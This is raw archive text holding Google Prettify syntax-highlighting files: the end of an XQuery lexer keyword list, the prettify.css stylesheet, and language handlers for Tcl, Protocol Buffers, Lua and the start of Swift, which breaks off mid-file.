node-database|xdmp:mul64|xdmp:modules-root|xdmp:modules-database|xdmp:merging|xdmp:merge-cancel|xdmp:merge|xdmp:md5|xdmp:logout|xdmp:login|xdmp:log-level|xdmp:log|xdmp:lock-release|xdmp:lock-acquire|xdmp:load|xdmp:invoke-in|xdmp:invoke|xdmp:integer-to-octal|xdmp:integer-to-hex|xdmp:http-put|xdmp:http-post|xdmp:http-options|xdmp:http-head|xdmp:http-get|xdmp:http-delete|xdmp:hosts|xdmp:host-status|xdmp:host-name|xdmp:host|xdmp:hex-to-integer|xdmp:hash64|xdmp:hash32|xdmp:has-privilege|xdmp:groups|xdmp:group-serves|xdmp:group-servers|xdmp:group-name|xdmp:group-hosts|xdmp:group|xdmp:get-session-field-names|xdmp:get-session-field|xdmp:get-response-encoding|xdmp:get-response-code|xdmp:get-request-username|xdmp:get-request-user|xdmp:get-request-url|xdmp:get-request-protocol|xdmp:get-request-path|xdmp:get-request-method|xdmp:get-request-header-names|xdmp:get-request-header|xdmp:get-request-field-names|xdmp:get-request-field-filename|xdmp:get-request-field-content-type|xdmp:get-request-field|xdmp:get-request-client-certificate|xdmp:get-request-client-address|xdmp:get-request-body|xdmp:get-current-user|xdmp:get-current-roles|xdmp:get|xdmp:function-name|xdmp:function-module|xdmp:function|xdmp:from-json|xdmp:forests|xdmp:forest-status|xdmp:forest-restore|xdmp:forest-restart|xdmp:forest-name|xdmp:forest-delete|xdmp:forest-databases|xdmp:forest-counts|xdmp:forest-clear|xdmp:forest-backup|xdmp:forest|xdmp:filesystem-file|xdmp:filesystem-directory|xdmp:exists|xdmp:excel-convert|xdmp:eval-in|xdmp:eval|xdmp:estimate|xdmp:email|xdmp:element-content-type|xdmp:elapsed-time|xdmp:document-set-quality|xdmp:document-set-property|xdmp:document-set-properties|xdmp:document-set-permissions|xdmp:document-set-collections|xdmp:document-remove-properties|xdmp:document-remove-permissions|xdmp:document-remove-collections|xdmp:document-properties|xdmp:document-locks|xdmp:document-load|xdmp:document-insert|xdmp:document-get-quality|xdmp:document-get-properties|xdmp:document-get-permissions|xdmp:document-get-collections|xdmp:document-get|xdmp:document-forest|xdmp:document-delete|xdmp:document-add-properties|xdmp:document-add-permissions|xdmp:document-add-collections|xdmp:directory-properties|xdmp:directory-locks|xdmp:directory-delete|xdmp:directory-create|xdmp:directory|xdmp:diacritic-less|xdmp:describe|xdmp:default-permissions|xdmp:default-collections|xdmp:databases|xdmp:database-restore-validate|xdmp:database-restore-status|xdmp:database-restore-cancel|xdmp:database-restore|xdmp:database-name|xdmp:database-forests|xdmp:database-backup-validate|xdmp:database-backup-status|xdmp:database-backup-purge|xdmp:database-backup-cancel|xdmp:database-backup|xdmp:database|xdmp:collection-properties|xdmp:collection-locks|xdmp:collection-delete|xdmp:collation-canonical-uri|xdmp:castable-as|xdmp:can-grant-roles|xdmp:base64-encode|xdmp:base64-decode|xdmp:architecture|xdmp:apply|xdmp:amp-roles|xdmp:amp|xdmp:add64|xdmp:add-response-header|xdmp:access|trgr:trigger-set-recursive|trgr:trigger-set-permissions|trgr:trigger-set-name|trgr:trigger-set-module|trgr:trigger-set-event|trgr:trigger-set-description|trgr:trigger-remove-permissions|trgr:trigger-module|trgr:trigger-get-permissions|trgr:trigger-enable|trgr:trigger-disable|trgr:trigger-database-online-event|trgr:trigger-data-event|trgr:trigger-add-permissions|trgr:remove-trigger|trgr:property-content|trgr:pre-commit|trgr:post-commit|trgr:get-trigger-by-id|trgr:get-trigger|trgr:document-scope|trgr:document-content|trgr:directory-scope|trgr:create-trigger|trgr:collection-scope|trgr:any-property-content|thsr:set-entry|thsr:remove-term|thsr:remove-synonym|thsr:remove-entry|thsr:query-lookup|thsr:lookup|thsr:load|thsr:insert|thsr:expand|thsr:add-synonym|spell:suggest-detailed|spell:suggest|spell:remove-word|spell:make-dictionary|spell:load|spell:levenshtein-distance|spell:is-correct|spell:insert|spell:double-metaphone|spell:add-word|sec:users-collection|sec:user-set-roles|sec:user-set-password|sec:user-set-name|sec:user-set-description|sec:user-set-default-permissions|sec:user-set-default-collections|sec:user-remove-roles|sec:user-privileges|sec:user-get-roles|sec:user-get-description|sec:user-get-default-permissions|sec:user-get-default-collections|sec:user-doc-permissions|sec:user-doc-collections|sec:user-add-roles|sec:unprotect-collection|sec:uid-for-name|sec:set-realm|sec:security-version|sec:security-namespace|sec:security-installed|sec:security-collection|sec:roles-collection|sec:role-set-roles|sec:role-set-name|sec:role-set-description|sec:role-set-default-permissions|sec:role-set-default-collections|sec:role-remove-roles|sec:role-privileges|sec:role-get-roles|sec:role-get-description|sec:role-get-default-permissions|sec:role-get-default-collections|sec:role-doc-permissions|sec:role-doc-collections|sec:role-add-roles|sec:remove-user|sec:remove-role-from-users|sec:remove-role-from-role|sec:remove-role-from-privileges|sec:remove-role-from-amps|sec:remove-role|sec:remove-privilege|sec:remove-amp|sec:protect-collection|sec:privileges-collection|sec:privilege-set-roles|sec:privilege-set-name|sec:privilege-remove-roles|sec:privilege-get-roles|sec:privilege-add-roles|sec:priv-doc-permissions|sec:priv-doc-collections|sec:get-user-names|sec:get-unique-elem-id|sec:get-role-names|sec:get-role-ids|sec:get-privilege|sec:get-distinct-permissions|sec:get-collection|sec:get-amp|sec:create-user-with-role|sec:create-user|sec:create-role|sec:create-privilege|sec:create-amp|sec:collections-collection|sec:collection-set-permissions|sec:collection-remove-permissions|sec:collection-get-permissions|sec:collection-add-permissions|sec:check-admin|sec:amps-collection|sec:amp-set-roles|sec:amp-remove-roles|sec:amp-get-roles|sec:amp-doc-permissions|sec:amp-doc-collections|sec:amp-add-roles|search:unparse|search:suggest|search:snippet|search:search|search:resolve-nodes|search:resolve|search:remove-constraint|search:parse|search:get-default-options|search:estimate|search:check-options|prof:value|prof:reset|prof:report|prof:invoke|prof:eval|prof:enable|prof:disable|prof:allowed|ppt:clean|pki:template-set-request|pki:template-set-name|pki:template-set-key-type|pki:template-set-key-options|pki:template-set-description|pki:template-in-use|pki:template-get-version|pki:template-get-request|pki:template-get-name|pki:template-get-key-type|pki:template-get-key-options|pki:template-get-id|pki:template-get-description|pki:need-certificate|pki:is-temporary|pki:insert-trusted-certificates|pki:insert-template|pki:insert-signed-certificates|pki:insert-certificate-revocation-list|pki:get-trusted-certificate-ids|pki:get-template-ids|pki:get-template-certificate-authority|pki:get-template-by-name|pki:get-template|pki:get-pending-certificate-requests-xml|pki:get-pending-certificate-requests-pem|pki:get-pending-certificate-request|pki:get-certificates-for-template-xml|pki:get-certificates-for-template|pki:get-certificates|pki:get-certificate-xml|pki:get-certificate-pem|pki:get-certificate|pki:generate-temporary-certificate-if-necessary|pki:generate-temporary-certificate|pki:generate-template-certificate-authority|pki:generate-certificate-request|pki:delete-template|pki:delete-certificate|pki:create-template|pdf:make-toc|pdf:insert-toc-headers|pdf:get-toc|pdf:clean|p:status-transition|p:state-transition|p:remove|p:pipelines|p:insert|p:get-by-id|p:get|p:execute|p:create|p:condition|p:collection|p:action|ooxml:runs-merge|ooxml:package-uris|ooxml:package-parts-insert|ooxml:package-parts|msword:clean|mcgm:polygon|mcgm:point|mcgm:geospatial-query-from-elements|mcgm:geospatial-query|mcgm:circle|math:tanh|math:tan|math:sqrt|math:sinh|math:sin|math:pow|math:modf|math:log10|math:log|math:ldexp|math:frexp|math:fmod|math:floor|math:fabs|math:exp|math:cosh|math:cos|math:ceil|math:atan2|math:atan|math:asin|math:acos|map:put|map:map|map:keys|map:get|map:delete|map:count|map:clear|lnk:to|lnk:remove|lnk:insert|lnk:get|lnk:from|lnk:create|kml:polygon|kml:point|kml:interior-polygon|kml:geospatial-query-from-elements|kml:geospatial-query|kml:circle|kml:box|gml:polygon|gml:point|gml:interior-polygon|gml:geospatial-query-from-elements|gml:geospatial-query|gml:circle|gml:box|georss:point|georss:geospatial-query|georss:circle|geo:polygon|geo:point|geo:interior-polygon|geo:geospatial-query-from-elements|geo:geospatial-query|geo:circle|geo:box|fn:zero-or-one|fn:years-from-duration|fn:year-from-dateTime|fn:year-from-date|fn:upper-case|fn:unordered|fn:true|fn:translate|fn:trace|fn:tokenize|fn:timezone-from-time|fn:timezone-from-dateTime|fn:timezone-from-date|fn:sum|fn:subtract-dateTimes-yielding-yearMonthDuration|fn:subtract-dateTimes-yielding-dayTimeDuration|fn:substring-before|fn:substring-after|fn:substring|fn:subsequence|fn:string-to-codepoints|fn:string-pad|fn:string-length|fn:string-join|fn:string|fn:static-base-uri|fn:starts-with|fn:seconds-from-time|fn:seconds-from-duration|fn:seconds-from-dateTime|fn:round-half-to-even|fn:round|fn:root|fn:reverse|fn:resolve-uri|fn:resolve-QName|fn:replace|fn:remove|fn:QName|fn:prefix-from-QName|fn:position|fn:one-or-more|fn:number|fn:not|fn:normalize-unicode|fn:normalize-space|fn:node-name|fn:node-kind|fn:nilled|fn:namespace-uri-from-QName|fn:namespace-uri-for-prefix|fn:namespace-uri|fn:name|fn:months-from-duration|fn:month-from-dateTime|fn:month-from-date|fn:minutes-from-time|fn:minutes-from-duration|fn:minutes-from-dateTime|fn:min|fn:max|fn:matches|fn:lower-case|fn:local-name-from-QName|fn:local-name|fn:last|fn:lang|fn:iri-to-uri|fn:insert-before|fn:index-of|fn:in-scope-prefixes|fn:implicit-timezone|fn:idref|fn:id|fn:hours-from-time|fn:hours-from-duration|fn:hours-from-dateTime|fn:floor|fn:false|fn:expanded-QName|fn:exists|fn:exactly-one|fn:escape-uri|fn:escape-html-uri|fn:error|fn:ends-with|fn:encode-for-uri|fn:empty|fn:document-uri|fn:doc-available|fn:doc|fn:distinct-values|fn:distinct-nodes|fn:default-collation|fn:deep-equal|fn:days-from-duration|fn:day-from-dateTime|fn:day-from-date|fn:data|fn:current-time|fn:current-dateTime|fn:current-date|fn:count|fn:contains|fn:concat|fn:compare|fn:collection|fn:codepoints-to-string|fn:codepoint-equal|fn:ceiling|fn:boolean|fn:base-uri|fn:avg|fn:adjust-time-to-timezone|fn:adjust-dateTime-to-timezone|fn:adjust-date-to-timezone|fn:abs|feed:unsubscribe|feed:subscription|feed:subscribe|feed:request|feed:item|feed:description|excel:clean|entity:enrich|dom:set-pipelines|dom:set-permissions|dom:set-name|dom:set-evaluation-context|dom:set-domain-scope|dom:set-description|dom:remove-pipeline|dom:remove-permissions|dom:remove|dom:get|dom:evaluation-context|dom:domains|dom:domain-scope|dom:create|dom:configuration-set-restart-user|dom:configuration-set-permissions|dom:configuration-set-evaluation-context|dom:configuration-set-default-domain|dom:configuration-get|dom:configuration-create|dom:collection|dom:add-pipeline|dom:add-permissions|dls:retention-rules|dls:retention-rule-remove|dls:retention-rule-insert|dls:retention-rule|dls:purge|dls:node-expand|dls:link-references|dls:link-expand|dls:documents-query|dls:document-versions-query|dls:document-version-uri|dls:document-version-query|dls:document-version-delete|dls:document-version-as-of|dls:document-version|dls:document-update|dls:document-unmanage|dls:document-set-quality|dls:document-set-property|dls:document-set-properties|dls:document-set-permissions|dls:document-set-collections|dls:document-retention-rules|dls:document-remove-properties|dls:document-remove-permissions|dls:document-remove-collections|dls:document-purge|dls:document-manage|dls:document-is-managed|dls:document-insert-and-manage|dls:document-include-query|dls:document-history|dls:document-get-permissions|dls:document-extract-part|dls:document-delete|dls:document-checkout-status|dls:document-checkout|dls:document-checkin|dls:document-add-properties|dls:document-add-permissions|dls:document-add-collections|dls:break-checkout|dls:author-query|dls:as-of-query|dbk:convert|dbg:wait|dbg:value|dbg:stopped|dbg:stop|dbg:step|dbg:status|dbg:stack|dbg:out|dbg:next|dbg:line|dbg:invoke|dbg:function|dbg:finish|dbg:expr|dbg:eval|dbg:disconnect|dbg:detach|dbg:continue|dbg:connect|dbg:clear|dbg:breakpoints|dbg:break|dbg:attached|dbg:attach|cvt:save-converted-documents|cvt:part-uri|cvt:destination-uri|cvt:basepath|cvt:basename|cts:words|cts:word-query-weight|cts:word-query-text|cts:word-query-options|cts:word-query|cts:word-match|cts:walk|cts:uris|cts:uri-match|cts:train|cts:tokenize|cts:thresholds|cts:stem|cts:similar-query-weight|cts:similar-query-nodes|cts:similar-query|cts:shortest-distance|cts:search|cts:score|cts:reverse-query-weight|cts:reverse-query-nodes|cts:reverse-query|cts:remainder|cts:registered-query-weight|cts:registered-query-options|cts:registered-query-ids|cts:registered-query|cts:register|cts:query|cts:quality|cts:properties-query-query|cts:properties-query|cts:polygon-vertices|cts:polygon|cts:point-longitude|cts:point-latitude|cts:point|cts:or-query-queries|cts:or-query|cts:not-query-weight|cts:not-query-query|cts:not-query|cts:near-query-weight|cts:near-query-queries|cts:near-query-options|cts:near-query-distance|cts:near-query|cts:highlight|cts:geospatial-co-occurrences|cts:frequency|cts:fitness|cts:field-words|cts:field-word-query-weight|cts:field-word-query-text|cts:field-word-query-options|cts:field-word-query-field-name|cts:field-word-query|cts:field-word-match|cts:entity-highlight|cts:element-words|cts:element-word-query-weight|cts:element-word-query-text|cts:element-word-query-options|cts:element-word-query-element-name|cts:element-word-query|cts:element-word-match|cts:element-values|cts:element-value-ranges|cts:element-value-query-weight|cts:element-value-query-text|cts:element-value-query-options|cts:element-value-query-element-name|cts:element-value-query|cts:element-value-match|cts:element-value-geospatial-co-occurrences|cts:element-value-co-occurrences|cts:element-range-query-weight|cts:element-range-query-value|cts:element-range-query-options|cts:element-range-query-operator|cts:element-range-query-element-name|cts:element-range-query|cts:element-query-query|cts:element-query-element-name|cts:element-query|cts:element-pair-geospatial-values|cts:element-pair-geospatial-value-match|cts:element-pair-geospatial-query-weight|cts:element-pair-geospatial-query-region|cts:element-pair-geospatial-query-options|cts:element-pair-geospatial-query-longitude-name|cts:element-pair-geospatial-query-latitude-name|cts:element-pair-geospatial-query-element-name|cts:element-pair-geospatial-query|cts:element-pair-geospatial-boxes|cts:element-geospatial-values|cts:element-geospatial-value-match|cts:element-geospatial-query-weight|cts:element-geospatial-query-region|cts:element-geospatial-query-options|cts:element-geospatial-query-element-name|cts:element-geospatial-query|cts:element-geospatial-boxes|cts:element-child-geospatial-values|cts:element-child-geospatial-value-match|cts:element-child-geospatial-query-weight|cts:element-child-geospatial-query-region|cts:element-child-geospatial-query-options|cts:element-child-geospatial-query-element-name|cts:element-child-geospatial-query-child-name|cts:element-child-geospatial-query|cts:element-child-geospatial-boxes|cts:element-attribute-words|cts:element-attribute-word-query-weight|cts:element-attribute-word-query-text|cts:element-attribute-word-query-options|cts:element-attribute-word-query-element-name|cts:element-attribute-word-query-attribute-name|cts:element-attribute-word-query|cts:element-attribute-word-match|cts:element-attribute-values|cts:element-attribute-value-ranges|cts:element-attribute-value-query-weight|cts:element-attribute-value-query-text|cts:element-attribute-value-query-options|cts:element-attribute-value-query-element-name|cts:element-attribute-value-query-attribute-name|cts:element-attribute-value-query|cts:element-attribute-value-match|cts:element-attribute-value-geospatial-co-occurrences|cts:element-attribute-value-co-occurrences|cts:element-attribute-range-query-weight|cts:element-attribute-range-query-value|cts:element-attribute-range-query-options|cts:element-attribute-range-query-operator|cts:element-attribute-range-query-element-name|cts:element-attribute-range-query-attribute-name|cts:element-attribute-range-query|cts:element-attribute-pair-geospatial-values|cts:element-attribute-pair-geospatial-value-match|cts:element-attribute-pair-geospatial-query-weight|cts:element-attribute-pair-geospatial-query-region|cts:element-attribute-pair-geospatial-query-options|cts:element-attribute-pair-geospatial-query-longitude-name|cts:element-attribute-pair-geospatial-query-latitude-name|cts:element-attribute-pair-geospatial-query-element-name|cts:element-attribute-pair-geospatial-query|cts:element-attribute-pair-geospatial-boxes|cts:document-query-uris|cts:document-query|cts:distance|cts:directory-query-uris|cts:directory-query-depth|cts:directory-query|cts:destination|cts:deregister|cts:contains|cts:confidence|cts:collections|cts:collection-query-uris|cts:collection-query|cts:collection-match|cts:classify|cts:circle-radius|cts:circle-center|cts:circle|cts:box-west|cts:box-south|cts:box-north|cts:box-east|cts:box|cts:bearing|cts:arc-intersection|cts:and-query-queries|cts:and-query-options|cts:and-query|cts:and-not-query-positive-query|cts:and-not-query-negative-query|cts:and-not-query|css:get|css:convert|cpf:success|cpf:failure|cpf:document-set-state|cpf:document-set-processing-status|cpf:document-set-last-updated|cpf:document-set-error|cpf:document-get-state|cpf:document-get-processing-status|cpf:document-get-last-updated|cpf:document-get-error|cpf:check-transition|alert:spawn-matching-actions|alert:rule-user-id-query|alert:rule-set-user-id|alert:rule-set-query|alert:rule-set-options|alert:rule-set-name|alert:rule-set-description|alert:rule-set-action|alert:rule-remove|alert:rule-name-query|alert:rule-insert|alert:rule-id-query|alert:rule-get-user-id|alert:rule-get-query|alert:rule-get-options|alert:rule-get-name|alert:rule-get-id|alert:rule-get-description|alert:rule-get-action|alert:rule-action-query|alert:remove-triggers|alert:make-rule|alert:make-log-action|alert:make-config|alert:make-action|alert:invoke-matching-actions|alert:get-my-rules|alert:get-all-rules|alert:get-actions|alert:find-matching-rules|alert:create-triggers|alert:config-set-uri|alert:config-set-trigger-ids|alert:config-set-options|alert:config-set-name|alert:config-set-description|alert:config-set-cpf-domain-names|alert:config-set-cpf-domain-ids|alert:config-insert|alert:config-get-uri|alert:config-get-trigger-ids|alert:config-get-options|alert:config-get-name|alert:config-get-id|alert:config-get-description|alert:config-get-cpf-domain-names|alert:config-get-cpf-domain-ids|alert:config-get|alert:config-delete|alert:action-set-options|alert:action-set-name|alert:action-set-module-root|alert:action-set-module-db|alert:action-set-module|alert:action-set-description|alert:action-remove|alert:action-insert|alert:action-get-options|alert:action-get-name|alert:action-get-module-root|alert:action-get-module-db|alert:action-get-module|alert:action-get-description|zero-or-one|years-from-duration|year-from-dateTime|year-from-date|upper-case|unordered|true|translate|trace|tokenize|timezone-from-time|timezone-from-dateTime|timezone-from-date|sum|subtract-dateTimes-yielding-yearMonthDuration|subtract-dateTimes-yielding-dayTimeDuration|substring-before|substring-after|substring|subsequence|string-to-codepoints|string-pad|string-length|string-join|string|static-base-uri|starts-with|seconds-from-time|seconds-from-duration|seconds-from-dateTime|round-half-to-even|round|root|reverse|resolve-uri|resolve-QName|replace|remove|QName|prefix-from-QName|position|one-or-more|number|not|normalize-unicode|normalize-space|node-name|node-kind|nilled|namespace-uri-from-QName|namespace-uri-for-prefix|namespace-uri|name|months-from-duration|month-from-dateTime|month-from-date|minutes-from-time|minutes-from-duration|minutes-from-dateTime|min|max|matches|lower-case|local-name-from-QName|local-name|last|lang|iri-to-uri|insert-before|index-of|in-scope-prefixes|implicit-timezone|idref|id|hours-from-time|hours-from-duration|hours-from-dateTime|floor|false|expanded-QName|exists|exactly-one|escape-uri|escape-html-uri|error|ends-with|encode-for-uri|empty|document-uri|doc-available|doc|distinct-values|distinct-nodes|default-collation|deep-equal|days-from-duration|day-from-dateTime|day-from-date|data|current-time|current-dateTime|current-date|count|contains|concat|compare|collection|codepoints-to-string|codepoint-equal|ceiling|boolean|base-uri|avg|adjust-time-to-timezone|adjust-dateTime-to-timezone|adjust-date-to-timezone|abs)\b/],
         // Matching normal words if none of the previous regular expressions matched
         [PR['PR_PLAIN'], /^[A-Za-z0-9_\-\:]+/],
         // Matching whitespaces
         [PR['PR_PLAIN'], /^[\t\n\r \xA0]+/]
         ]),
    ['xq', 'xquery']);
PK!M�"��#it_sanctum/js/prettify/prettify.cssnu&1i�/**
 * @license
 * Copyright (C) 2015 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/* Pretty printing styles. Used with prettify.js. */


/* SPAN elements with the classes below are added by prettyprint. */
.pln { color: #000 }  /* plain text */

@media screen {
  .str { color: #080 }  /* string content */
  .kwd { color: #008 }  /* a keyword */
  .com { color: #800 }  /* a comment */
  .typ { color: #606 }  /* a type name */
  .lit { color: #066 }  /* a literal value */
  /* punctuation, lisp open bracket, lisp close bracket */
  .pun, .opn, .clo { color: #660 }
  .tag { color: #008 }  /* a markup tag name */
  .atn { color: #606 }  /* a markup attribute name */
  .atv { color: #080 }  /* a markup attribute value */
  .dec, .var { color: #606 }  /* a declaration; a variable name */
  .fun { color: red }  /* a function name */
}

/* Use higher contrast and text-weight for printable form. */
@media print, projection {
  .str { color: #060 }
  .kwd { color: #006; font-weight: bold }
  .com { color: #600; font-style: italic }
  .typ { color: #404; font-weight: bold }
  .lit { color: #044 }
  .pun, .opn, .clo { color: #440 }
  .tag { color: #006; font-weight: bold }
  .atn { color: #404 }
  .atv { color: #060 }
}

/* Put a border around prettyprinted code snippets. */
pre.prettyprint { padding: 2px; border: 1px solid #888 }

/* Specify class=linenums on a pre to get line numbering */
ol.linenums { margin-top: 0; margin-bottom: 0 } /* IE indents via margin-left */
li.L0,
li.L1,
li.L2,
li.L3,
li.L5,
li.L6,
li.L7,
li.L8 { list-style-type: none }
/* Alternate shading for lines */
li.L1,
li.L3,
li.L5,
li.L7,
li.L9 { background: #eee }
PK!�&�A
A
"it_sanctum/js/prettify/lang-tcl.jsnu&1i�/**
 * @license
 * Copyright (C) 2012 Pyrios
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for TCL
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-tcl">proc foo {} {puts bar}</pre>
 *
 * I copy-pasted lang-lisp.js, so this is probably not 100% accurate.
 * I used http://wiki.tcl.tk/1019 for the keywords, but tried to only
 * include as keywords that had more impact on the program flow
 * rather than providing convenience. For example, I included 'if'
 * since that provides branching, but left off 'open' since that is more
 * like a proc. Add more if it makes sense.
 *
 * @author pyrios@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         ['opn',             /^\{+/, null, '{'],
         ['clo',             /^\}+/, null, '}'],
         // A line comment that starts with ;
         [PR['PR_COMMENT'],     /^#[^\r\n]*/, null, '#'],
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)/, null, '"']
        ],
        [
         [PR['PR_KEYWORD'],     /^(?:after|append|apply|array|break|case|catch|continue|error|eval|exec|exit|expr|for|foreach|if|incr|info|proc|return|set|switch|trace|uplevel|upvar|while)\b/, null],
         [PR['PR_LITERAL'],
          /^[+\-]?(?:[0#]x[0-9a-f]+|\d+\/\d+|(?:\.\d+|\d+(?:\.\d*)?)(?:[ed][+\-]?\d+)?)/i],
         // A single quote possibly followed by a word that optionally ends with
         // = ! or ?.
         [PR['PR_LITERAL'],
          /^\'(?:-*(?:\w|\\[\x21-\x7e])(?:[\w-]*|\\[\x21-\x7e])[=!?]?)?/],
         // A word that optionally ends with = ! or ?.
         [PR['PR_PLAIN'],
          /^-*(?:[a-z_]|\\[\x21-\x7e])(?:[\w-]*|\\[\x21-\x7e])[=!?]?/i],
         // A printable non-space non-special character
         [PR['PR_PUNCTUATION'], /^[^\w\t\n\r \xA0()\"\\\';]+/]
        ]),
    ['tcl']);
PK!�Z�$it_sanctum/js/prettify/lang-proto.jsnu&1i�/**
 * @license
 * Copyright (C) 2006 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Protocol Buffers as described at
 * http://code.google.com/p/protobuf/.
 *
 * Based on the lexical grammar at
 * http://research.microsoft.com/fsharp/manual/spec2.aspx#_Toc202383715
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](PR['sourceDecorator']({
        'keywords': (
            'bytes,default,double,enum,extend,extensions,false,'
            + 'group,import,max,message,option,'
            + 'optional,package,repeated,required,returns,rpc,service,'
            + 'syntax,to,true'),
        'types': /^(bool|(double|s?fixed|[su]?int)(32|64)|float|string)\b/,
        'cStyleComments': true
      }), ['proto']);
PK!sz�	�	"it_sanctum/js/prettify/lang-lua.jsnu&1i�/**
 * @license
 * Copyright (C) 2008 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Lua.
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-lua">(my Lua code)</pre>
 *
 *
 * I used http://www.lua.org/manual/5.1/manual.html#2.1
 * Because of the long-bracket concept used in strings and comments, Lua does
 * not have a regular lexical grammar, but luckily it fits within the space
 * of irregular grammars supported by javascript regular expressions.
 *
 * @author mikesamuel@gmail.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
         // Whitespace
         [PR['PR_PLAIN'],       /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
         // A double or single quoted, possibly multi-line, string.
         [PR['PR_STRING'],      /^(?:\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)|\'(?:[^\'\\]|\\[\s\S])*(?:\'|$))/, null, '"\'']
        ],
        [
         // A comment is either a line comment that starts with two dashes, or
         // two dashes preceding a long bracketed block.
         [PR['PR_COMMENT'], /^--(?:\[(=*)\[[\s\S]*?(?:\]\1\]|$)|[^\r\n]*)/],
         // A long bracketed block not preceded by -- is a string.
         [PR['PR_STRING'],  /^\[(=*)\[[\s\S]*?(?:\]\1\]|$)/],
         [PR['PR_KEYWORD'], /^(?:and|break|do|else|elseif|end|false|for|function|if|in|local|nil|not|or|repeat|return|then|true|until|while)\b/, null],
         // A number is a hex integer literal, a decimal real literal, or in
         // scientific notation.
         [PR['PR_LITERAL'],
          /^[+-]?(?:0x[\da-f]+|(?:(?:\.\d+|\d+(?:\.\d*)?)(?:e[+\-]?\d+)?))/i],
         // An identifier
         [PR['PR_PLAIN'], /^[a-z_]\w*/i],
         // A run of punctuation
         [PR['PR_PUNCTUATION'], /^[^\w\t\n\r \xA0][^\w\t\n\r \xA0\"\'\-\+=]*/]
        ]),
    ['lua']);
PK!K�\`�
�
$it_sanctum/js/prettify/lang-swift.jsnu&1i�/**
 * @license
 * Copyright (C) 2015 Google Inc.
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Swift
 *
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then put your code in an HTML tag like
 *      <pre class="prettyprint lang-swift">(my swift code)</pre>
 * This file supports the following language extensions:
 *     lang-swift - Swift
 *
 * I used https://developer.apple.com/library/ios/documentation/Swift/Conceptual/Swift_Programming_Language/AboutTheLanguageReference.html
 * as the source of truth for this. The revision from 2015-10-21 (Swift 2.1) was used in most recent update.
 *
 * @author cerech@google.com
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
          //whitespace
          [PR['PR_PLAIN'],                /^[ \n\r\t\v\f\0]+/, null, ' \n\r\t\v\f\0'],
          //string literals
          [PR['PR_STRING'],               /^"(?:[^"\\]|(?:\\.)|(?:\\\((?:[^"\\)]|\\.)*\)))*"/, null, '"']
        ],
        [
          //floating point literals
          [PR['PR_LITERAL'],              /^(?:(?:0x[\da-fA-F][\da-fA-F_]*\.[\da-fA-F][\da-fA-F_]*[pP]?)|(?:\d[\d_]*\.\d[\d_]*[eE]?))[+-]?\d[\d_]*/, null],
          //integer literals
          [PR['PR_LITERAL'],              /^-?(?:(?:0(?:(?:b[01][01_]*)|(?:o[0-7][0-7_]*)|(?:x[\da-fA-F][\da-fA-F_]*)))|(?:\d[\d_]*))/, null],
          //some other literals
          [PR['PR_LITERAL'],              /^(?:true|false|nil)\b/, null],
          //keywords
